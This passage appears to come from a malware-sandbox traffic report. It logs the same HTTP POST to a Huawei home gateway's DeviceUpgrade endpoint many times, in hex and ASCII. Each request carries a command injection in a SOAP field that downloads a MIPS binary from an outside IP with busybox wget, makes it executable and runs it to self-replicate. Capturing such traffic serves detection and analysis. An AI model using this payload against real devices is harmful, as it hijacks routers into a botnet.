3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 